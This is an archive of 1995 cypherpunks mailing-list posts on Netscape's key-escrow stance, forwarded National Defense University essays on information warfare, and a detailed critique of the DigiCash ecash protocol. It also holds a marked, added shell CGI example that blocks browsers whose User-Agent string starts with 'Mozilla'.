The title "Software Munitions Expert" or similar such should probably be 
changed to "GAK marketing expert" however.

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 3 Dec 1995 03:52:21 +0800
To: solman@MIT.EDU
Subject: Re: Cypher secure versus computationally unbounded adversary
In-Reply-To: <9512021931.AA01944@ua.MIT.EDU>
Message-ID: <9512021936.AA01996@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


What I meant to say, was that the encryption protocol is secure versus
a computationally unbounded passive adversary AND REQUIRES NO PRIOR
COMMUNICATION.

Sorry 'bout that,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:56:17 +0800
To: Lance Cottrell <loki@obscura.com>
Subject: Re: Netscape GAK page.
In-Reply-To: <ace657a40802100417e5@[137.110.24.250]>
Message-ID: <Pine.SUN.3.91.951202143940.1199F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Lance Cottrell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I have gone back and improved the "Netscape GAK?" page based on a good
> night's sleep and some helpful suggestions (thank you all who mailed me
> about the page). I would appreciate feedback on the page, especially from
> Netscape or its employees (in an official or unofficial capacity). I have
> tried to be even handed in my presentation of the information, while not
> hiding the fact that I strongly disagree with the stance that Netscape has
> taken.

If you are interested in a scathing essay on Netscape and its 
responsibilities (in my view) for opposing GAK for the page, I will write 
one for you free of charge....

> 
> <http://www.obscura.com/~loki/GAK.html>
> 
>         -Lance
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> -----END PGP SIGNATURE-----
> 
> ----------------------------------------------------------
> Lance Cottrell   loki@obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://obscura.com/~loki/Welcome.html or FTP to obscura.com
> 
> "Love is a snowmobile racing across the tundra.  Suddenly
> it flips over, pinning you underneath.  At night the ice
> weasels come."
>                         --Nietzsche
> ----------------------------------------------------------
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 3 Dec 1995 05:15:18 +0800
To: cypherpunks@toad.com
Subject: Netscape Feeding Frenzy
Message-ID: <Pine.SUN.3.91.951202145657.22791B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	It's sad to see so many bright people try and condemn a company
or its employees in such a short time and with so little evidence.
Yes, I, like you, don't want to see GAK on Netscape products. But this
is ridiculous. It reminds me of the Microsoft Win95 fiasco. (And I do hate
Microsoft). Remember all the heat they took just because someone claimed
that the installation software took a snapshot of your system and network
and then gave it to Microsoft through the MSN. It even made it into trade
magazines like InformationWeek. Of course they then had their tail between
their legs when they realized that it was just the registration wizard
that asked for permission and that the information uploaded was much
less intrusive.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 05:11:45 +0800
To: sameer <sameer@c2.org>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512021936.LAA09776@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951202155101.4012A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, sameer wrote:

> > 
> > With which firm?  Or have you made it an in-house effort?
> > 
> 
> 	There was no Netscape (or RSADSI, for that matter [an RSADSI
> employee showed up, but it was on his own time]) representative at the
> recent Bernstein hearing in SF. I think that shows how much they
> really care.

While I suspected this, I don't think we needed it to show us how much 
they really care.  It seems fairly obvious from the outset.


> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 23:11:29 +0800
To: cypherpunks@toad.com
Subject: Gibson Warfare
Message-ID: <199512021503.QAA14471@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/forum28.html


   Forum, Number 28, May 1995 
   
  WHAT IS INFORMATION WARFARE?
  
   Martin C. Libicki, National Defense University
   
   
   Is Information War (IW) a nascent, perhaps embryonic art, or simply
   the newest version of a time-honored feature of warfare? Is it a new
   form of conflict that owes its existence to the burgeoning global
   information infrastructure, or an old one whose origin lies in the
   wetware of the human brain but has been given new life by the
   information age? Is it a unified field or opportunistic assemblage?

   Since March 1993, Chairman of the Joint Chiefs of Staff Memorandum of
   Policy Number 30 (MOP 30) has set forth definitions and relationships
   that have guided the joint community in its thinking about the related
   concepts of information warfare and command and control warfare. As
   these seminal ideas have evolved, their definitions and relationships
   have changed as well. MOP 30 is under revision, and both higher level
   policy documents for the Department of Defense and doctrinal
   publications of the Joint Staff and Services are either in draft form
   or under revision.

   In light of the unformed state of these concepts, alternative
   definitions and taxonomies for twenty-first century warfare are
   proposed:

    1. command-and-control warfare [C2W];

    2. intelligence-based warfare [IBW];

    3. electronic warfare [EW];

    4. psychological operations [PSYOPS];

    5. hackerwar -- software-based attacks on information systems;

    6. information economic warfare [IEW] -- war via the control of
       information trade; and

    7. cyberwar [combat in the virtual realm]. ...
       
------------------

   
URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch07.html

Hacker Warfare


   The hacker attacks discussed here are attacks on civilian targets
   (military hacker attacks come under the rubric of C2 warfare). [Note 41]
   Although attacks on civilian and military targets share some
   characteristics of offense and defense, military systems tend to be
   more secure than civilian systems, because they are not designed for
   public access. Critical systems are often disconnected from all others
   -- "air gapped," as it were, by a physical separation between those
   systems and all others.

   From an operational point of view, civilian systems can be attacked at
   physical, syntactic, and semantic levels. Here, the focus is on
   syntactic attacks, which affect bit movement. Concern for physical
   attacks (see above, on C2W) is relatively low [Note 42] (although some
   big computers on Wall Street can be disabled by going after the little
   computers that control their air-conditioning). Semantic attacks
   (which affect the meaning of what computers receive from elsewhere)
   are covered below, under cyberwarfare.

   Hacker warfare can be further differentiated into defensive and
   offensive operations. The debate on defensive hacker warfare concerns
   the appropriate role for the DoD in safeguarding nonmilitary
   computers. The debate on offensive hacker warfare concerns whether it
   should take place at all. In contrast to, say, proponents of tank or
   submarine warfare, only a few hackers argue that the best defense
   against a hacker attack is a hacker attack.

   Whether hacker warfare is a useful instrument of policy is a question
   that defense analysts and science fiction writers may be equally well
   placed to answer. Hacker warfare would, without doubt, be a new form
   of conflict ...

-----------------

URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch09.html

   
Cyberwarfare

   
   Of the seven forms of information warfare, cyberwarfare -- a broad
   category that includes information terrorism, semantic attacks,
   simula-warfare and Gibson-warfare -- is clearly the least tractable
   because by far the most fictitious, differing only in degree from
   information warfare as a whole. The global information infrastructure
   has yet to evolve to the point where any of these forms of combat is
   possible; such considerations are akin to discussions in the Victorian
   era of what air-to-air combat would be. And the infrastructure may
   never evolve to enable such attacks. The dangers or, better, the
   pointlessness, of building the infrastructure described below may be
   visible well before the opportunity to build it will present itself. ...

   The difference between a semantic attack and hacker warfare is that
   the latter produces random, or even systematic, failures in systems,
   and they cease to operate. A system under semantic attack operates and
   will be perceived as operating correctly (otherwise the semantic
   attack is a failure), but it will generate answers at variance with
   reality.

   The possibility of a semantic attack presumes certain characteristics
   of the information systems. Systems, for instance, may rely on sensor
   input to make decisions about the real world (e.g., nuclear power
   system that monitors seismic activity). If the sensors can be fooled,
   the systems can be tricked (e.g., shutting down in face of a
   nonexistent earthquake). Safeguards against failure might lie in, say,
   sensors redundant by type and distribution, aided by a wise
   distribution of decisionmaking power among humans and machines.


  GIBSON-WARFARE


   The author confesses to having read William Gibson's Neuromancer
   [Note 61] and, worse, to having seen the Disney movie "TRON." In both,
   heroes and villains are transformed into virtual characters who
   inhabit the innards of enormous systems and there duel with others
   equally virtual, if less virtuous. What these heroes and villains are
   doing inside those systems or, more to the point, why anyone would
   wish to construct a network that would permit them to wage combat
   there in the first place is never really clear.

   Why bring up Gibson's novel and the Disney movie? Because to judge
   what otherwise sober analysts choose to include as information warfare
   -- such as hacker warfare or esoteric versions of psychological
   warfare -- the range of what can be included in its definition is
   hardly limited by reality. ...

   Possible? Actually, yes. Relevant to national security? Not soon.
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 23:25:28 +0800
To: cypherpunks@toad.com
Subject: Info Foes
Message-ID: <199512021516.QAA15201@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/z1106.html


   Strategic Forum
   
                      THE REVOLUTION IN MILITARY AFFAIRS
                                       
   Martin Libicki, CDR James Hazlett, et al.

[Excerpts]
       
  DISCUSSION I: STRATEGIC CHALLENGES
  
   Those who assess future strategic challenges tend to look to Asian
   countries, and to categorize competitors as peer, regional, or niche.

    Asia and the Nation-State

   Most conference participants believe that, over the next twenty
   years, the fulcrum of world politics will continue to shift from
   Europe and its peripheries to the Asia-Pacific region. The period of
   European dominance produced innumerable wars as various countries
   challenged each other for power, resources, and sovereignty. With the
   formation of the European Union and the dissolution of the Warsaw
   Pact, great power rivalry in particular and the nation-state in
   general are fading somewhat in importance.

   The nation-state remains strong in Asia, however. The last fifty years
   have seen considerable economic progress as various nations have made
   themselves richer by grasping the secrets of rapid industrialization.
   This trend, which started in Japan in the 1950s and 1960s, spread to
   the Tigers in the 1970s, ASEAN countries in the 1980s, and China and
   perhaps India in the 1990s, has left no Asian country unaffected.
   Economic growth, however, has not made the nation-state obsolete. To
   the contrary, the nation-state has been instrumental in creating the
   internal and external conditions for economic growth. European history
   suggests that countries, once they taste wealth, will struggle for
   power. Will Asian countries follow that pattern or demonstrate new
   models of what the nation-state is capable of? ...

    Types of Competitors

   One taxonomy of future threats suggested at the conference is to
   classify potential competitors as peer, regional, or niche. A peer
   competitor could challenge our military across the board. A niche
   competitor would be incapable of doing so, but would strive to inhibit
   or defeat U.S. intervention by developing capabilities such as
   primitive weapons of mass destruction, sensor blinders, physical
   terrorism, information system attacks, psychological operations, or
   hostage maneuvers. ...
   
  DISCUSSION II: OPERATIONAL CHALLENGES
  
   Considerable evidence suggests that commercial access to information
   -- GPS readings, space-based imagery, and Internet data -- could be
   transformed into military advantage thereby levelling the playing
   field between ourselves and our potential opponents. Other dual-use
   technologies, for instance, those that would permit remote piloting of
   aerial vehicles, permit commercial technologies such as electronic
   video photography to act as powerful military tools accessible to all
   (RPVs are made in more than thirty countries).

    Technologies That Level the Field

   Does the proliferation in information technologies necessarily negate
   our current military lead? Information-based warfare creates new
   vulnerabilities for industrial-age institutions slow to adapt. Because
   most U.S. logistics facilities and command nodes are not well hidden,
   they are vulnerable to precision strike. The widespread availability
   of overhead imagery coupled with GPS integration into weapon systems--
   no more than a few years away for countries such as India--poses a
   serious threat to which our improving defensive measures (e.g.,
   anti-tactical ballistic missiles) will provide only a partial solution.

   Our own counter-C2 operations are complicated by the rapidly falling
   cost of bandwidth and redundancy. Even if 90 percent of a bit flow can
   be interdicted, the remaining 10 percent may suffice for operational
   uses. Rapid expansion of cellular nodes, particularly through
   exploitation of commercial space assets, may make targeting and
   communications denial difficult or impossible. Multiple channels of
   electronic access will also complicate psychological operations and
   countermeasures.

   With the advent of the global information infrastructure, a clever
   adversary could take advantage of open information systems to enhance
   its own communications, information, navigation, intelligence, and
   operational support: examples include GPS, one-meter imagery, weather
   data, and even CNN. Every year more information with potential
   military use can be gleaned by anyone from the Internet without
   leaving fingerprints. How easily can a country's access to the global
   satellite communications networks be blocked? The coming global
   information infrastructure will have many points of entry. It will
   also be difficult to curtail certain services (e.g., global
   navigation) without denying them to U.S. users or even our own
   national security establishment.

    Technologies that Keep Us Ahead

   The United States, nevertheless, retains an edge in two important
   areas: space and systems integration. Space systems are relatively
   difficult to build and although many potential middle-income
   adversaries can borrow space services from third parties, fewer can
   own satellites, and far fewer can launch them. Thus the United States
   will retain a clear edge in the size and sophistication (timeliness
   and interpretation) of space capabilities, in their adoption and
   adaptation for military uses, in their augmentation or adaptation for
   the particulars of future contingencies, and in the assurance of their
   continuity.

   The distinctions between data and information, and between information
   and knowing could also favor U.S. forces. There are vast differences
   between, for instance, access to meteorological imagery and
   determining, for instance, that a locus of operations is likely to be
   fogged in 24 hours hence (a distinction relevant to the Falklands
   campaign). The art of operational planning is not acquired
   automatically with the acquisition of computers. Similarly, as sensors
   proliferate in type as well as numbers, data fusion is likely to
   become more decisive in future conflicts. ...

   
POLICY RECOMMENDATIONS

    Two conference threads merit further examination:

     * U.S. defense policies that make it more difficult for potential
       competitors to threaten their neighbors and hold off the United
       States at the same time may be worth pursuing for that fact alone.

     * If militarily relevant information technologies are everywhere,
       sophistication at using them may be a better predictor of how
       challenging a competitor may become for the United States.
       Therefore, in addition to worrying about how large future foes are
       (and sizing our own forces accordingly), we should also focus on
       the potential sophistication of our foes (and develop doctrine
       accordingly).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 09:17:54 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <v02130502ace652b201d3@[199.125.128.5]>
Message-ID: <199512030035.QAA14181@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Nor are HTTP servers.

	http://www.c2.org/apachessl/. Commercial availability within a
week or two. (Yeah, I know, I've been saying that for a while. This
time I *really* mean it. ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 09:02:45 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <2.2b7.32.19951203004908.0087902c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 12/1/95 -0800, you wrote:
>
>  I had lunch with Jim Clark today, and explained the furor that was
>currently going on in cypherpunks and elsewhere.  After lunch he sent
>me the e-mail that I've attached below to pass along.  I think the gist
>of it is that if governments require key escrow, we will have to do it
>in order to sell our products with encryption into those countries.
[rest removed for brevity]

Well someone has to say it...

"I am glad to see that Jim Clark is no longer hocking up GAK."

I just hope Netscape does not get seduced by the dark side of the feds and
implement GAK "because they have to".  It is one thing to have cryptography
that is brute-forceable in a few weeks, it is another to have a secret key
that some nosey government agent can use to decrypt it in seconds.  If Netscape
implements GAK I will move to something else because I will not be able to
trust that some other nasty surprise will exist in the software.  (As well
as having no real security left in the product.)

Do I believe that Netscape will implement GAK in the near future?  Not
really.  Not unless they go through another purge like the one back in
February(?), but I do not see that as being very likely.  (With the current
IPO, news of an employee purge would probably drive down the stock and that
would be the last thing the top brass would want.)
|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 09:09:16 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <2.2b7.32.19951203004910.00868478@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 PM 11/29/95 -0800, you wrote:
>At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
>> I'm working on an "obnoxify" program to convert 
>> normal html documents into documents that look 
>> normal to non-netscape browsers, but are too painful to
>> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
>> I think tomorrow evening would be a good time to decide 
>> whether or not to distribute it.
>
>Is there any way one could set up a dirty pictures web
>page in such a fashion that it would be difficult, painful,
>and impractical to get at the pictures through that page
>with a netscape browser?

It would not be very hard.  You just need to have all connections go through
a CGI script first.  There is a variable that reports the client to the
server.  Just bounce them to an error if the variable starts with "Mozilla".

Also, you do not need access to the server code to do this if you are using
NCSA.  There is a way you can force execution of CGI scripts from your local
directory using an .htaccess file.  (It requires using an "addtype" command
to enable the cgi parsing.)  I will have to dig out the exact mime type
required.

If I get some working Netscape bounce code, I will post it here.  (Actually
I want one that bounces AOL users to the Mr. Rogers home page on pbs.org.)
|      Poly wants *more* than one cracker!        | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |
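
The user-agent check described in the post above, as an added example that is not part of the original message or its author's code: a POSIX shell CGI script that applies the "starts with Mozilla" test to HTTP_USER_AGENT, the variable CGI fills from the client's own header. The function names, the 403 response and the sample header strings are constructed for illustration; the samples show that the prefix also matches another browser that announces itself as Mozilla-compatible, and that any client sending a different string is served.

```shell
#!/bin/sh
# Added example, not code from the thread.
# CGI hands the script the client's self-reported User-Agent header in the
# HTTP_USER_AGENT environment variable. The value is chosen by the client.

# is_bounced UA: succeeds when the prefix test from the post matches.
is_bounced() {
    case "$1" in
        Mozilla*) return 0 ;;
        *)        return 1 ;;
    esac
}

# gate_response UA: print the complete CGI response for one request.
# The document body is a placeholder; a real script would emit the page.
gate_response() {
    if is_bounced "$1"; then
        printf 'Status: 403 Forbidden\nContent-Type: text/plain\n\n'
        printf 'This page is not available to your browser.\n'
    else
        printf 'Content-Type: text/html\n\n'
        printf '<html><body>placeholder document body</body></html>\n'
    fi
}

# audit_agents: read User-Agent strings on stdin, one per line, and print
# "<verdict><TAB><string>" so the effect of the prefix rule can be reviewed
# before it is deployed.
audit_agents() {
    while IFS= read -r ua || [ -n "$ua" ]; do
        if is_bounced "$ua"; then verdict=bounce; else verdict=serve; fi
        printf '%s\t%s\n' "$verdict" "$ua"
    done
}

# Constructed sample header values (not taken from any log).
SAMPLE_AGENTS='Mozilla/2.0b3 (X11; I; SunOS 5.4 sun4m)
Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)
NCSA_Mosaic/2.7b2 (X11;SunOS 5.4 sun4m)
Lynx/2.4.2 libwww/2.14
'

# Run as a CGI program only when the server has set up the CGI environment.
if [ -n "${GATEWAY_INTERFACE:-}" ]; then
    gate_response "${HTTP_USER_AGENT:-}"
fi
```

Piping the samples through `audit_agents` lists two bounced and two served entries; a request with no User-Agent header at all is served as well.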





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 09:16:00 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EF90.132D@netscape.com>
Message-ID: <199512030053.QAA15582@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   How would having an official representative from Netscape in
> the audience have influenced the outcome of the proceedings?  I would

	It's called moral support for our lawyers. Cindy mentioned
after the hearing at lunch how much it helped to have people in the
audience. Having official people from industry would probably have
helped her morale even more.

> have liked to attend, but was in the process of trying to get
> a beta release out at the time.

	Ah, I see, so the short-term goal of making sure a beta
release isn't one day late takes precedence over the long term future
of cryptography. (And, essentially, your company's long term profits.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 00:41:30 +0800
To: cypherpunks@toad.com
Subject: Four Info Threats
Message-ID: <199512021625.RAA16934@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/forum35.html


   Forum, Number 35, July 1995
   
 
                               THE NEXT ENEMY
                                       
   Martin C. Libicki, National Defense University

[Excerpts]
   
   The Cold War offered military planners considerable strategic clarity
   -- the threat was known, and the problem was generating a force
   structure of sufficient size and sophistication to counter it. Today's
   military threats are varied and, for the most part, well below the
   level that even a shrinking U.S. force can handle comfortably. Threats
   ten to twenty years out, however, must be taken seriously because of
   the long time required to complete a major systems acquisition; to
   develop, test, and institutionalize new doctrine; and to accomplish
   the organizational innovations necessary to use both effectively.

   Future threats may be divided into four categories: peers, bullies,
   terrorism, and chaos. ...

   Peers

   Few planners think it likely that the next twenty years will see a
   reemergence of a nation that can pose a challenge to U.S. military
   power as broadly as the Soviet Union did. However, at least two
   countries (Russia and China) could conceivably be peer adversaries at
   the strategic level of nuclear weapons, space, and information
   systems.  ...

   Another avenue of future competition may be information warfare. Can
   or should the United States hold other nations' participation in the
   world economy at risk? The United States might be able to shut down
   another nation's banking system but not without risk of collateral
   damage to the global banking system. Can physical war be replaced by a
   survival contest among rival information systems under attack? Perhaps
   the United States should concentrate on developing defensive systems.
   The United States has the biggest stones, but also the most glass in
   its house. ...

   A world of peer strategic competition would drive the military in
   familiar directions towards: nuclear forces, satellites and other
   long-range warning systems; tactical ballistic missile defense systems
   (including for allies); perhaps strategic defense systems and space
   attack systems; air defense in general; information warfare and
   security; and robust command-and-control.
   
   Bullies
   
   If the circumstances and logic of the Bottom Up Review hold true for
   two more decades, U.S. armed forces will be sized and structured
   primarily to engage in two simultaneous major regional contingencies
   (MRCs). The usual suspects in such MRCs (e.g., Iran, Iraq, North
   Korea) are presently unsophisticated rogue states that aspire to
   nuclear weapons and delivery systems. Conference participants believe
   that U.S. forces could cope with the challenges of future conventional
   warfare, even if force levels continue to diminish. However, two
   events would make the United States rethink its strategy -- nuclear
   weapons proliferation, and the sophisticated exploitation of world
   technology markets. ...

   Alternatively, an MRC opponent may be able to avoid going to the
   nuclear threshold by a strategy which uses smart munitions, commercial
   command-and-control, and a variety of surveillance technologies (e.g.,
   unmanned aerial vehicles, third-party satellite surveillance) to exact
   damaging casualties on U.S. forces. ...

   Against a sophisticated regional foe, the United States might not want
   to use platforms at all but rely on a combination of stand-off attack
   forces, and information-based warfare assets (for giving targeting
   data to local coalition partners), coupled with special operations
   forces used for liaison and other tasks.

   Terrorism

   Largely because of the limited capability that classical military
   instruments have in coping with terrorism, conference participants
   kept returning to the threat that it may pose to U.S. national
   security. Incidents may range from the use of conventional explosives
   (e.g., what if the van in the World Trade Center explosion had been
   parked in a more vulnerable spot), to nuclear or chemical weapons,
   biological agents, and their analogue in cyberspace -- information
   warfare.

   Devices that can cause terror are getting easier to manufacture and
   transport and harder to detect. The equipment for replicating
   biological agents is inexpensive; the equipment for replicating
   computer agents is even cheaper. Many otherwise third-world Asian
   nations have very large computer-literate cohorts that make them
   potential information warfare powers. ...

   Chaos

   Over the next two decades, states will continue to fail. Some failures
   may create circumstances (e.g., refugees, malcontents, and
   environmental damage) which topple other states. To cope, the United
   States may need a robust capability to conduct peace and relief
   operations. ...

   A concentration on peace operations may also be a good reason to
   expand foreign military interactions. Improving interoperability with
   future coalition partners carries many advantages. Yet, above a
   certain technological level of integration, the risk of exposing
   information on U.S. capabilities to what may be temporary allies has
   to be carefully managed.

   If countering chaos were the primary mission of the U.S. armed forces,
   then they would have to become lighter and more mobile (because states
   often fail with little warning, and the United States usually responds
   only in extremis). The Army and Marine Corps would have larger roles,
   while the Navy and Air Force would focus on lift. As emergency
   operations become the norm, some functions assigned to reserve units
   may have to be shifted to active ones (e.g., to allow civil affairs
   assets to be used more frequently).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Sun, 3 Dec 1995 09:44:42 +0800
To: cypherpunks@toad.com
Subject: Questions/Comments on ecash protocol
In-Reply-To: <199512012222.OAA18230@netcom14.netcom.com>
Message-ID: <199512030127.RAA03496@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green <mtwain@netcom.com> wrote, to our great pleasure:
> By popular request, DigiCash is releasing the protocol specs.
> 
> The specs are available at 
> http://www.digicash.com/ecash/protocol.html
> 
> Please be aware that the document is work in progress. More 
> specifications, including byte level descriptions of the message 
> format will be added throughout the weekend.

I read these specs for a little while last night.  Here are some of my
questions/comments.  To prevent this message from becoming huge, I won't
quote much from the protocol document itself; the URL is above if you want it.
I'll ignore the spelling/grammar; they can be fixed later.

Also: would people prefer if this discussion were moved to the ecash
mailing list (ecash@digicash.com)?  I _would_ prefer that this was discussed
in public, though, and not just with DigiCash.

First:  Could you put some kind of protocol version number (so we know when
the protocol changes) and document version number (so we know when the
document changes, and can reference a particular version) somewhere near
the top of the document?

I realize that the document is incomplete.  For example, it is missing
a description of the SETUP_REQ message and response.  From what I can gather
from other wording in the document, this message is used to get the bank's
public key.  I would hope this key is certified in some way.  Alternatively,
I notice that the ecash client, in the routine ec_cash_setup, passes a value
called hard_n (a 768-bit composite) to check_sig.  Does this mean that
the bank's public key (or at least the public key used to sign the message
containing that bank's real public key) is fixed, and hardcoded into the
client?

What is the function f, used in the payment_hdr to hash the payer_code
and desc fields, as well as in WITHDRAW3 to calculate N = f(n) * r**h?
There is reason to believe it is SHA, but I thought I saw some stuff in the
client that indicated that the output of f is 132 _bytes_ long (but I'm
not exceptionally sure of this, not having source and all).

What are the flags used in the Withdraw Request and the payment_hdr?

Please clarify what parts of the payment_hdr are shipped around.  The document
says that the shop checks if the descr_hash matches the description.
Since the description is in the second part of the payment_hdr, does that
mean that both parts are sent to the shop?  Noticing that the payer_code
(which the payer is supposed to keep secret) is in the second part, this
doesn't seem to be right.  Also, the document states that the payment hash
is not sent from the payer to the shop or from the shop to the mint.  However,
the payment hash is just the SHA of the first part of the payment_hdr,
which _is_ sent around, so although the payment hash isn't transmitted
per se, it can certainly be calculated.

What is the expries field in the payment_hdr?  Note that it's an int rather
than a time.

A (very slight) privacy concern: the payer's bank is sent in the clear,
which gives a very small amount of information about the identity of the
payer.  More on who knows what later.

Is it in fact the case that all coins on one payment use the same payment hash
when encrypting their signatures (the field sig in onl_coin)?

If (M,e) is the mint's public modulus/exponent, and (N,h) is public mod/exp
for a particular coin denomination, are the following statements true:

o If n is the coin number (in onl_coin, assumedly the same n as used in the
  withdraw request), and hdr is the first part of the payment header,
  then sig (in onl_coin) equals

     ([ SHA(hdr) XOR ((f(n)^(1/h)) mod N) ] ^ e) mod M

o A deposit (which contains a userID in the userhdr, a payment_hdr in
  the dep record, and a pair (n,sig) for each coin) is accepted by the bank iff

     ([ SHA(payment_hdr) XOR ((sig^(1/e)) mod M) ] ^ h) mod N = f(n)

  _and_ either payment_hdr.shop_accID corresponds to userID,
	  or   a payer_code is supplied such that
		 payment_hdr.payer_hash = f(payer_code).

Since the payer_code is not supposed to be sent around, how is it sent to
the bank in order to cancel a payment?  The document says "This allows him
to cancel the payment (deposit in his account)...", which seems to indicate
that a cancellation is just a deposit (made out to someone else), accompanied
by an appropriate payer_code.  It is important that an eavesdropper not
be able to ever see the payer_code that corresponds to a payment, or
else she could present both to the bank and say "cancel this payment",
and get the money "back".

Where is the facility for tracing double spenders?  Perhaps it's just
part of the "incomplete" part of the document, but I can't even see
where it would fit in to what we've got; neither the withdrawal nor the
payment messages seem to encode _any_ information about the payer in
the coins, and the bank cannot seem to know who withdrew the coin that
ended up being spent twice (due to the blinding).

Is there a way to change the public key associated with an account?
Is it just a matter of sending another OPENACC1 message?

Exactly what kind of anonymity/privacy/security does ecash offer?
Let's examine who knows what.

Our cast of characters:

Charlie, the customer
Sam, the shopkeeper
the Bank (for simplicity, both Charlie and Sam use the same Bank for now)
Eve, a passive eavesdropper
Mitch, an active Man-In-The-Channel
the Government (which may try to force others to reveal information)

Depending on which channels Eve and Mitch have access to, and whether or
not they can tell, by examining the channel, or by selection, the
identities of one or more of the communicating parties, they can get
varying amounts of information.  I'll assume they have access to
all communications for now.

Not knowing the SETUP_REQ protocol is problematic.  As mentioned above,
steps need to be taken to prevent Mitch from getting Charlie's password
and using it to usurp his account.  We will assume that it turns out OK,
